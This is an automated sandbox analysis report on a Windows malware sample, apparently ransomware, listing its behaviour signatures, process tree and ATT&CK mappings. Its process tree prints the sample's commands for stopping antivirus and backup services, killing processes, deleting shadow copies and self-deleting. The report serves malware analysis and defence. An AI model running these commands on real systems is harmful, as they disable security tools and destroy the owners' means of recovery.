Analysis

  • max time kernel
    149s
  • resource
    win10v191014
  • submitted
    10-01-2020 12:47

General

  • Target

    9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48

  • Sample

    200110-1s3n6rbyfe

  • SHA256

    9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48

Malware Config

Signatures

  • Deletes shadow copies 2 TTPs 2 IoCs
  • Interacts with shadow copies 2 TTPs 12 IoCs
  • Runs net.exe 10 IoCs
  • Launches SC.exe 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Drops startup file 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Drops file in Program Files directory 257 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48.exe
    "C:\Users\Admin\AppData\Local\Temp\9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:4932
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      2⤵
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      PID:4952
      • C:\Windows\SysWOW64\net.exe
        "net.exe" stop avpsus /y
        3⤵
        • Runs net.exe
        • Suspicious use of WriteProcessMemory
        PID:5044
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop avpsus /y
          4⤵
          • Runs net.exe
          PID:5084
      • C:\Windows\SysWOW64\net.exe
        "net.exe" stop McAfeeDLPAgentService /y
        3⤵
        • Runs net.exe
        • Suspicious use of WriteProcessMemory
        PID:5112
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
          4⤵
          • Runs net.exe
          PID:4208
      • C:\Windows\SysWOW64\net.exe
        "net.exe" stop mfewc /y
        3⤵
        • Runs net.exe
        • Suspicious use of WriteProcessMemory
        PID:1572
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop mfewc /y
          4⤵
          • Runs net.exe
          PID:2040
      • C:\Windows\SysWOW64\net.exe
        "net.exe" stop BMR Boot Service /y
        3⤵
        • Runs net.exe
        • Suspicious use of WriteProcessMemory
        PID:1012
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop BMR Boot Service /y
          4⤵
          • Runs net.exe
          PID:3996
      • C:\Windows\SysWOW64\net.exe
        "net.exe" stop NetBackup BMR MTFTP Service /y
        3⤵
        • Runs net.exe
        • Suspicious use of WriteProcessMemory
        PID:3988
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
          4⤵
          • Runs net.exe
          PID:4504
      • C:\Windows\SysWOW64\sc.exe
        "sc.exe" config SQLTELEMETRY start= disabled
        3⤵
        • Launches SC.exe
        PID:4536
      • C:\Windows\SysWOW64\sc.exe
        "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
        3⤵
        • Launches SC.exe
        PID:3316
      • C:\Windows\SysWOW64\sc.exe
        "sc.exe" config SQLWriter start= disabled
        3⤵
        • Launches SC.exe
        PID:4608
      • C:\Windows\SysWOW64\sc.exe
        "sc.exe" config SstpSvc start= disabled
        3⤵
        • Launches SC.exe
        PID:4576
      • C:\Windows\SysWOW64\taskkill.exe
        "taskkill.exe" /IM mspub.exe /F
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4704
      • C:\Windows\SysWOW64\taskkill.exe
        "taskkill.exe" /IM mydesktopqos.exe /F
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4348
      • C:\Windows\SysWOW64\taskkill.exe
        "taskkill.exe" /IM mydesktopservice.exe /F
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4308
      • C:\Windows\SysWOW64\vssadmin.exe
        "vssadmin.exe" Delete Shadows /all /quiet
        3⤵
        • Deletes shadow copies
        PID:3732
      • C:\Windows\SysWOW64\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
        3⤵
        • Interacts with shadow copies
        PID:4128
      • C:\Windows\SysWOW64\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
        3⤵
        • Interacts with shadow copies
        PID:4060
      • C:\Windows\SysWOW64\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
        3⤵
        • Interacts with shadow copies
        PID:2396
      • C:\Windows\SysWOW64\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
        3⤵
        • Interacts with shadow copies
        PID:4876
      • C:\Windows\SysWOW64\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
        3⤵
        • Interacts with shadow copies
        PID:4564
      • C:\Windows\SysWOW64\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
        3⤵
        • Interacts with shadow copies
        PID:4940
      • C:\Windows\SysWOW64\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
        3⤵
        • Interacts with shadow copies
        PID:4996
      • C:\Windows\SysWOW64\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
        3⤵
        • Interacts with shadow copies
        PID:772
      • C:\Windows\SysWOW64\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
        3⤵
        • Interacts with shadow copies
        PID:5068
      • C:\Windows\SysWOW64\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
        3⤵
        • Interacts with shadow copies
        PID:1976
      • C:\Windows\SysWOW64\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
        3⤵
        • Interacts with shadow copies
        PID:1708
      • C:\Windows\SysWOW64\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
        3⤵
        • Interacts with shadow copies
        PID:4384
      • C:\Windows\SysWOW64\vssadmin.exe
        "vssadmin.exe" Delete Shadows /all /quiet
        3⤵
        • Deletes shadow copies
        PID:4500
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4964
      • C:\Windows\SysWOW64\PING.EXE
        ping 1.1.1.1 -n 1 -w 3000
        3⤵
        • Runs ping.exe
        PID:5004
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4100

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

File Deletion

2
T1107

Discovery

Remote System Discovery

1
T1018

Impact

Inhibit System Recovery

2
T1490

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4952-0-0x0000000000400000-0x0000000000412000-memory.dmp
    Filesize

    72KB